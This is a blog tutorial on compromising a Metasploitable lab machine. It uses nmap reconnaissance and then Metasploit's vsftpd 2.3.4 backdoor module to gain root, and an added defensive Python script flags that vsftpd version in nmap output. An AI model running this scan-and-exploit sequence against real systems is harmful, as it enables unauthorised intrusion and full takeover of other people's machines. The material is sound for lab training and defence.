Learn hacking example 1

in #hack, 6 years ago

Hi everyone,

In this article, I want to show you how to hack a machine on the same network as you.

The situation is this: you want to infect a machine on the same network and take control of it.

For this we will apply the methodology we learned before (https://steemit.com/hack/@pierlave/learn-hacking-1-00-overview). These are just guidelines; you will adjust them depending on your task!

The environment is as follows.
Kali machine ip
Metasploitable machine ip unknown.

1) Reconnaissance phase
Scan the network with Nmap (a scanning tool, https://nmap.org/, included in Kali by default).
Open a terminal and run the command (the * means all the IPs from 1 to 255).
nmap -sP 162.168.56.*

The metasploitable has the ip

Scan for the services running.
nmap -sT -v

Scan for the versions running
nmap -sV -v

After you have this information, you can try to exploit some services you know are vulnerable or you can do a vulnerability scan.

OpenVAS is a free vulnerability scanner. You can install it by following this tutorial (https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/).

You start a job to scan the IP, and it gives you a list of vulnerabilities and their severity.

I chose to exploit ftp vsftpd 2.3.4 on port 21.
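
The same version scan is how a defender finds this service on their own network before anyone else does. The script below is an added example, not part of the original article: it parses `nmap -sV` text output and flags services on a denylist. The sample output, the 192.0.2.x addresses, the host name and the denylist are constructed for illustration; only the vsftpd 2.3.4 entry comes from this article.

```python
import re

# Constructed denylist: (pattern over the VERSION column, reason).
# vsftpd 2.3.4 is the version named in this article; add your own entries.
DENYLIST = [
    (re.compile(r"\bvsftpd 2\.3\.4(?![\w.])", re.I),
     "backdoored vsftpd release, replace with a current package"),
]

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_nmap_sv(text):
    """Yield (host, port, proto, service, version) for every open port."""
    host = None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, service, version = m.groups()
            yield host, int(port), proto, service, version.strip()

def flag_denylisted(text):
    """Return (host, port, version, reason) for each denylisted service."""
    return [(host, port, version, reason)
            for host, port, _proto, _svc, version in parse_nmap_sv(text)
            for pattern, reason in DENYLIST
            if pattern.search(version)]

# Constructed sample of `nmap -sV` output (documentation addresses).
SAMPLE = """\
Nmap scan report for 192.0.2.10
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
Nmap scan report for files.lab.example (192.0.2.11)
PORT   STATE  SERVICE VERSION
21/tcp open   ftp     vsftpd 3.0.5
23/tcp closed telnet
"""

if __name__ == "__main__":
    for host, port, version, reason in flag_denylisted(SAMPLE):
        print(f"{host}:{port} runs {version}: {reason}")
```

Closed ports and patched versions are skipped, so the report lists only hosts that still need the package replaced.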

2) Gaining access
In this phase, we will use what we learned from the scanning section to exploit the machine.

To exploit, we will use Metasploit (it's installed by default on Kali). We need to start PostgreSQL to make it work.

Open a terminal
service postgresql start

Start Metasploit

Search for an existing exploit for the vulnerability you want to exploit.
search vsftpd 2.3.4

We see an exploit we want to use
use exploit/unix/ftp/vsftpd_234_backdoor

You can see the options for the exploit
show options

Set the remote host to the victim's machine

Send the exploit

The exploit worked; you now have access to the machine.

Run the command whoami to see what your privilege level is.

You are root! You now have complete control over this machine.

The information provided on hacking is to be used for educational purposes only. The creator is in no way responsible for any misuse of the information provided. All the information provided is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word "Hacking" should be regarded as "Ethical hacking". You implement the information given at your own risk.